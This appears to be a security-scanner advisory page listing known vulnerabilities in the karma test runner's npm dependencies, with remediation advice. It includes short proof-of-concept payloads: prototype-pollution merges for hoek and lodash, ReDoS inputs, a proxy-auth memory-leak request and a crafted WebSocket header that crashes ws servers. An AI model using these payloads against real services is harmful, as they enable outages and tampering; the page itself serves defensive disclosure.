Last tested: 01 Aug, 2018

karma vulnerabilities

Spectacular Test Runner for JavaScript.


karma (latest)

Published 24 Jul, 2018

Known vulnerabilities: 6
Vulnerable paths: 9
Dependencies: 511

Prototype Pollution

low severity

Detailed paths

  • Introduced through: karma@2.0.5 > log4js@2.11.0 > loggly@1.1.1 > request@2.75.0 > hawk@3.1.3 > hoek@2.16.3
  • Introduced through: karma@2.0.5 > log4js@2.11.0 > loggly@1.1.1 > request@2.75.0 > hawk@3.1.3 > boom@2.10.1 > hoek@2.16.3
  • Introduced through: karma@2.0.5 > log4js@2.11.0 > loggly@1.1.1 > request@2.75.0 > hawk@3.1.3 > cryptiles@2.0.5 > boom@2.10.1 > hoek@2.16.3
  • Introduced through: karma@2.0.5 > log4js@2.11.0 > loggly@1.1.1 > request@2.75.0 > hawk@3.1.3 > sntp@1.0.9 > hoek@2.16.3

Overview

hoek provides utility methods for the hapi ecosystem.

Affected versions of this package are vulnerable to Prototype Pollution. Its utility functions allow modification of the Object prototype. If an attacker can control part of the structure passed to these functions, they could add or modify an existing property.

PoC by Olivier Arteau (HoLyVieR)

var Hoek = require('hoek');
var malicious_payload = '{"__proto__":{"oops":"It works !"}}';

var a = {};
console.log("Before : " + a.oops);
Hoek.merge({}, JSON.parse(malicious_payload));
console.log("After : " + a.oops);

Remediation

Upgrade hoek to versions 4.2.1, 5.0.3 or higher.

References

Time of Check Time of Use (TOCTOU)

medium severity

Detailed paths

  • Introduced through: karma@2.0.5 > chokidar@2.0.4 > fsevents@1.2.4 > node-pre-gyp@0.10.3 > tar@4.4.4 > chownr@1.0.1

Overview

chownr recursively changes the ownership of files and directories (similar to chown -R). Affected versions of chownr are vulnerable to Time of Check Time of Use (TOCTOU): the package does not dereference symbolic links and instead changes the owner of the link itself.
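
For illustration only, a minimal sketch (not from the advisory) of how chownr is typically invoked; the path, uid and gid below are hypothetical:

var chownr = require('chownr');

// Recursively change ownership of everything under the directory.
// If the tree contains an attacker-controlled symbolic link, affected
// versions apply the ownership change to the link itself rather than
// safely handling the race between checking and using the path.
chownr('/var/app/uploads', 1000, 1000, function (err) {
  if (err) throw err;
  console.log('ownership changed recursively');
});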

Remediation

There is no fix version for chownr.

References

Uninitialized Memory Exposure

medium severity
  • Vulnerable module: tunnel-agent
  • Introduced through: log4js@2.11.0

Detailed paths

  • Introduced through: karma@2.0.5 > log4js@2.11.0 > loggly@1.1.1 > request@2.75.0 > tunnel-agent@0.4.3

Overview

tunnel-agent is an HTTP proxy tunneling agent. Affected versions of the package are vulnerable to Uninitialized Memory Exposure.

A possible memory disclosure vulnerability exists when a value of type number is used to set the proxy.auth option of a request, resulting in possible uninitialized memory exposure in the request body.

This is a result of unobstructed use of the Buffer constructor, whose insecure default constructor increases the odds of memory leakage.

Details

Constructing a Buffer with an integer N creates a Buffer of length N containing raw (not zeroed) memory.

In the following example, the first call allocates 100 bytes of uninitialized memory, while the second allocates only the memory needed to hold the string "100":

// uninitialized Buffer of length 100
x = new Buffer(100);
// initialized Buffer with value of '100'
x = new Buffer('100');

tunnel-agent's request construction uses the default Buffer constructor as-is, making it easy to append uninitialized memory to an existing list. If the value of the buffer list is exposed to users, it may expose raw server side memory, potentially holding secrets, private data and code. This is a similar vulnerability to the infamous Heartbleed flaw in OpenSSL.

Proof of concept by ChALkeR

require('request')({
  method: 'GET',
  uri: 'http://www.example.com',
  tunnel: true,
  proxy:{
      protocol: 'http:',
      host:"127.0.0.1",
      port:8080,
      auth:80
  }
});

You can read more about the insecure Buffer behavior on our blog.

Similar vulnerabilities were discovered in request, mongoose, ws and sequelize.

Remediation

Upgrade tunnel-agent to version 0.6.0 or higher. Note: this is vulnerable only for Node <= 4.

References

Insecure Randomness

medium severity

Detailed paths

  • Introduced through: karma@2.0.5 > log4js@2.11.0 > loggly@1.1.1 > request@2.75.0 > hawk@3.1.3 > cryptiles@2.0.5

Overview

cryptiles is a package for general crypto utilities.

Affected versions of this package are vulnerable to Insecure Randomness. The randomDigits() method is supposed to return a cryptographically strong pseudo-random data string, but its output was biased toward certain digits. An attacker may be able to guess the created digits.
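
A minimal sketch of the affected API, assuming the installed version exposes randomDigits() (older releases on this dependency path, such as 2.0.5, may not):

var Cryptiles = require('cryptiles');

// randomDigits(count) is meant to return `count` cryptographically strong
// random digits; in affected versions the output is biased toward certain
// digits, making values such as one-time codes easier to guess.
var code = Cryptiles.randomDigits(6);
console.log(code);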

Remediation

Upgrade cryptiles to version 4.1.2 or higher.

References

Regular Expression Denial of Service (ReDoS)

high severity

Detailed paths

  • Introduced through: karma@2.0.5 > log4js@2.11.0 > loggly@1.1.1 > timespan@2.3.0

Overview

timespan is a JavaScript TimeSpan library for node.js (and soon the browser).

Affected versions of this package are vulnerable to Regular expression Denial of Service (ReDoS). It parses date strings using regular expressions, which can cause a slowdown of about 10 seconds for input 50k characters long.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

In most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30-character string takes around 52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String              Number of C's    Number of steps
ACCCX               3                38
ACCCCX              4                71
ACCCCCX             5                136
ACCCCCCCCCCCCCCX    14               65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations cause the engine to work very slowly (exponentially related to input size, as shown above), so an attacker can exploit this to make the service excessively consume CPU, resulting in a Denial of Service.

Remediation

There is no fix version for timespan.

References

Regular Expression Denial of Service (ReDoS)

low severity

Detailed paths

  • Introduced through: karma@2.0.5 > expand-braces@0.1.2 > braces@0.1.5

Overview

braces is a Bash-like brace expansion, implemented in JavaScript.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks. It used a regular expression (^\{(,+(?:(\{,+\})*),*|,*(?:(\{,+\})*),+)\}) to detect empty braces, which can take about 10 seconds of matching time for data 50K characters long.
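
As a hedged illustration (payload shape inferred from the regular expression above, not copied from the advisory), a long run of commas wrapped in braces forces the empty-brace check into heavy backtracking:

var braces = require('braces');

// Normal use: expand a Bash-style brace pattern.
console.log(braces('{a,b,c}')); // [ 'a', 'b', 'c' ]

// Illustrative malicious input: tens of thousands of commas inside braces.
var payload = '{' + ','.repeat(50000) + '}';
console.time('braces');
braces(payload);
console.timeEnd('braces');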

Disclosure Timeline

  • Feb 15th, 2018 - Initial Disclosure to package owner
  • Feb 16th, 2018 - Initial Response from package owner
  • Feb 18th, 2018 - Fix issued
  • Feb 19th, 2018 - Vulnerability published

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

In most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30-character string takes around 52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String              Number of C's    Number of steps
ACCCX               3                38
ACCCCX              4                71
ACCCCCX             5                136
ACCCCCCCCCCCCCCX    14               65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations cause the engine to work very slowly (exponentially related to input size, as shown above), so an attacker can exploit this to make the service excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade braces to version 2.3.1 or higher.

References

Vulnerable versions of karma

Fixed in 2.0.0

Regular Expression Denial of Service (ReDoS)

medium severity

Detailed paths

  • Introduced through: socket.io@1.7.1 > socket.io-client@1.7.1 > engine.io-client@1.8.1 > parsejson@0.0.3
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > socket.io-client@1.7.3 > engine.io-client@1.8.3 > parsejson@0.0.3

Overview

parsejson is a method that parses a JSON string and returns a JSON object.

Affected versions of this package are vulnerable to Regular expression Denial of Service (ReDoS) attacks. An attacker may pass specially crafted JSON data, causing the server to hang.
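
A hedged sketch of the call shape; the payload below only illustrates the idea of a long, almost-valid JSON string and is not the advisory's exact trigger:

var parsejson = require('parsejson');

// Normal use: parse a JSON string.
console.log(parsejson('{"hello": "world"}'));

// Illustrative near-valid input that keeps the validation regex busy.
var payload = '{"a":' + ' '.repeat(50000) + '1';
console.time('parsejson');
parsejson(payload);
console.timeEnd('parsejson');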

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

In most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30-character string takes around 52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String              Number of C's    Number of steps
ACCCX               3                38
ACCCCX              4                71
ACCCCCX             5                136
ACCCCCCCCCCCCCCX    14               65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations cause the engine to work very slowly (exponentially related to input size, as shown above), so an attacker can exploit this to make the service excessively consume CPU, resulting in a Denial of Service.

Remediation

There is no fix available.

References

Regular Expression Denial of Service (ReDoS)

low severity

Detailed paths

  • Introduced through: socket.io@1.7.1 > debug@2.3.3
  • Introduced through: socket.io@1.7.1 > engine.io@1.8.1 > debug@2.3.3
  • Introduced through: socket.io@1.7.1 > socket.io-adapter@0.5.0 > debug@2.3.3
  • Introduced through: socket.io@1.7.1 > socket.io-client@1.7.1 > debug@2.3.3
  • Introduced through: socket.io@1.7.1 > socket.io-client@1.7.1 > engine.io-client@1.8.1 > debug@2.3.3
  • Introduced through: socket.io@1.7.1 > socket.io-parser@2.3.1 > debug@2.2.0
  • Introduced through: socket.io@1.7.1 > socket.io-adapter@0.5.0 > socket.io-parser@2.3.1 > debug@2.2.0
  • Introduced through: socket.io@1.7.1 > socket.io-client@1.7.1 > socket.io-parser@2.3.1 > debug@2.2.0
  • Introduced through: nodemon@1.7.1 > debug@2.2.0
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > debug@2.3.3
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > engine.io@1.8.3 > debug@2.3.3
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > socket.io-adapter@0.5.0 > debug@2.3.3
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > socket.io-client@1.7.3 > debug@2.3.3
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > socket.io-client@1.7.3 > engine.io-client@1.8.3 > debug@2.3.3
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > socket.io-parser@2.3.1 > debug@2.2.0
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > socket.io-adapter@0.5.0 > socket.io-parser@2.3.1 > debug@2.2.0
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > socket.io-client@1.7.3 > socket.io-parser@2.3.1 > debug@2.2.0

Overview

debug is a JavaScript debugging utility modelled after Node.js core's debugging technique.

debug uses printf-style formatting. Affected versions of this package are vulnerable to Regular expression Denial of Service (ReDoS) attacks via the %o formatter (pretty-print an object on a single line). It used a regular expression (/\s*\n\s*/g) to strip whitespace and replace newlines with spaces so the data is joined into a single line. The impact is low: roughly 2 seconds of matching time for data 50k characters long.
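
A hedged sketch of how the %o formatter is reached; the whitespace payload illustrates the regex's worst case and is not the advisory's exact proof of concept:

var debug = require('debug');
debug.enable('app');       // enable the namespace programmatically
var log = debug('app');

// Normal use of the %o formatter.
log('status: %o', { ok: true });

// Illustrative payload: ~50k whitespace characters with no newline make the
// /\s*\n\s*/g replacement backtrack heavily (roughly 2 seconds of work).
var payload = ' '.repeat(50000);
console.time('debug %o');
log('%o', payload);
console.timeEnd('debug %o');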

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

In most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30-character string takes around 52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String              Number of C's    Number of steps
ACCCX               3                38
ACCCCX              4                71
ACCCCCX             5                136
ACCCCCCCCCCCCCCX    14               65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations cause the engine to work very slowly (exponentially related to input size, as shown above), so an attacker can exploit this to make the service excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade debug to version 2.6.9, 3.1.0 or higher.

References

Regular Expression Denial of Service (ReDoS)

low severity

Detailed paths

  • Introduced through: socket.io@1.7.1 > debug@2.3.3 > ms@0.7.2
  • Introduced through: socket.io@1.7.1 > engine.io@1.8.1 > debug@2.3.3 > ms@0.7.2
  • Introduced through: socket.io@1.7.1 > socket.io-adapter@0.5.0 > debug@2.3.3 > ms@0.7.2
  • Introduced through: socket.io@1.7.1 > socket.io-client@1.7.1 > debug@2.3.3 > ms@0.7.2
  • Introduced through: socket.io@1.7.1 > socket.io-client@1.7.1 > engine.io-client@1.8.1 > debug@2.3.3 > ms@0.7.2
  • Introduced through: socket.io@1.7.1 > socket.io-parser@2.3.1 > debug@2.2.0 > ms@0.7.1
  • Introduced through: socket.io@1.7.1 > socket.io-adapter@0.5.0 > socket.io-parser@2.3.1 > debug@2.2.0 > ms@0.7.1
  • Introduced through: socket.io@1.7.1 > socket.io-client@1.7.1 > socket.io-parser@2.3.1 > debug@2.2.0 > ms@0.7.1
  • Introduced through: mocha@1.7.1 > ms@0.3.0
  • Introduced through: nodemon@1.7.1 > debug@2.2.0 > ms@0.7.1
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > debug@2.3.3 > ms@0.7.2
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > engine.io@1.8.3 > debug@2.3.3 > ms@0.7.2
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > socket.io-adapter@0.5.0 > debug@2.3.3 > ms@0.7.2
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > socket.io-client@1.7.3 > debug@2.3.3 > ms@0.7.2
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > socket.io-client@1.7.3 > engine.io-client@1.8.3 > debug@2.3.3 > ms@0.7.2
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > socket.io-parser@2.3.1 > debug@2.2.0 > ms@0.7.1
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > socket.io-adapter@0.5.0 > socket.io-parser@2.3.1 > debug@2.2.0 > ms@0.7.1
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > socket.io-client@1.7.3 > socket.io-parser@2.3.1 > debug@2.2.0 > ms@0.7.1

Overview

ms is a tiny millisecond conversion utility.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) due to an incomplete fix for the previously reported vulnerability npm:ms:20151024. That fix limited the length of accepted input strings to 10,000 characters, which turned out to be insufficient, making it possible to block the event loop for 0.3 seconds (on a typical laptop) with a specially crafted string passed to the ms() function.

Proof of concept

ms = require('ms');
ms('1'.repeat(9998) + 'Q') // Takes about ~0.3s

Note: Snyk's patch for this vulnerability limits input length to 100 characters. This new limit was deemed to be a breaking change by the author. Based on user feedback, we believe the risk of breakage is very low, while the value to your security is much greater, and therefore opted to still capture this change in a patch for earlier versions as well. Whenever patching security issues, we always suggest running tests on your code to validate that nothing has been broken.

For more information on Regular Expression Denial of Service (ReDoS) attacks, go to our blog.

Disclosure Timeline

  • Feb 9th, 2017 - Reported the issue to package owner.
  • Feb 11th, 2017 - Issue acknowledged by package owner.
  • April 12th, 2017 - Fix PR opened by Snyk Security Team.
  • May 15th, 2017 - Vulnerability published.
  • May 16th, 2017 - Issue fixed and version 2.0.0 released.
  • May 21st, 2017 - Patches released for versions >=0.7.1, <=1.0.0.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

In most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30-character string takes around 52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String              Number of C's    Number of steps
ACCCX               3                38
ACCCCX              4                71
ACCCCCX             5                136
ACCCCCCCCCCCCCCX    14               65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations cause the engine to work very slowly (exponentially related to input size, as shown above), so an attacker can exploit this to make the service excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade ms to version 2.0.0 or higher.

References

Regular Expression Denial of Service (DoS)

high severity

Detailed paths

  • Introduced through: bower@1.7.1 > glob@4.5.3 > minimatch@2.0.10
  • Introduced through: nodemon@1.7.1 > minimatch@0.3.0

Overview

minimatch is a minimalistic matching library used for converting glob expressions into JavaScript RegExp objects. Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Many Regular Expression implementations may reach edge cases that cause them to work very slowly (exponentially related to input size). An attacker can exploit this by supplying a specially crafted input that pushes the program into these extreme situations, causing the service to excessively consume CPU and resulting in a Denial of Service.

An attacker can provide a long value to the minimatch function, which nearly matches the pattern being matched. This will cause the regular expression matching to take a long time, all the while occupying the event loop and preventing it from processing other requests and making the server unavailable (a Denial of Service attack).
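
A hedged sketch of a typical call site; the long input only illustrates where attacker-controlled data can reach the matcher and is not a specific exploit payload:

var minimatch = require('minimatch');

// Typical use: test a path against a glob pattern.
console.log(minimatch('src/app/index.js', 'src/**/*.js')); // true

// Risk arises when the string being matched (e.g. a file name taken from a
// request) is very long and nearly matches a complex pattern, forcing the
// generated RegExp to backtrack heavily.
var untrusted = 'a/'.repeat(10000) + 'b';
minimatch(untrusted, 'a/**/a/**/a/**/c');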

You can read more about Regular Expression Denial of Service (ReDoS) on our blog.

Remediation

Upgrade minimatch to version 3.0.2 or greater.

References

Prototype Pollution

low severity

Detailed paths

  • Introduced through: bower@1.7.1 > inquirer@0.10.0 > lodash@3.10.1
  • Introduced through: bower@1.7.1 > insight@0.7.0 > inquirer@0.10.1 > lodash@3.10.1
  • Introduced through: karma@1.7.1 > lodash@3.10.1

Overview

lodash is a JavaScript utility library delivering modularity, performance & extras.

Affected versions of this package are vulnerable to Prototype Pollution. Its utility functions allow modification of the Object prototype. If an attacker can control part of the structure passed to these functions, they could add or modify an existing property.

PoC by Olivier Arteau (HoLyVieR)

var _= require('lodash');
var malicious_payload = '{"__proto__":{"oops":"It works !"}}';

var a = {};
console.log("Before : " + a.oops);
_.merge({}, JSON.parse(malicious_payload));
console.log("After : " + a.oops);

Remediation

Upgrade lodash to version 4.17.5 or higher.

References

Denial of Service (DoS)

high severity

Detailed paths

  • Introduced through: socket.io@1.7.1 > engine.io@1.8.1 > ws@1.1.1
  • Introduced through: socket.io@1.7.1 > socket.io-client@1.7.1 > engine.io-client@1.8.1 > ws@1.1.1
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > engine.io@1.8.3 > ws@1.1.2
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > socket.io-client@1.7.3 > engine.io-client@1.8.3 > ws@1.1.2

Overview

ws is a simple to use websocket client, server and console for node.js.

Affected versions of the package are vulnerable to Denial of Service (DoS) attacks. A specially crafted value of the Sec-WebSocket-Extensions header that used Object.prototype property names as extension or parameter names could be used to make a ws server crash.

PoC:

const WebSocket = require('ws');
const net = require('net');

const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor';  // or ',;constructor'

  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r\n'
  ].join('\r\n');

  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption - An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For example, the npm ws package.

Remediation

Upgrade ws to version 1.1.5, 3.3.1 or higher.

References

Fixed in 1.5.0

Insecure Randomness

medium severity

Detailed paths

  • Introduced through: socket.io@1.4.1 > engine.io@1.6.5 > ws@1.0.1
  • Introduced through: socket.io@1.4.1 > socket.io-client@1.4.1 > engine.io-client@1.6.5 > ws@1.0.1
  • Introduced through: karma@1.4.1 > socket.io@1.7.2 > engine.io@1.8.2 > ws@1.1.1
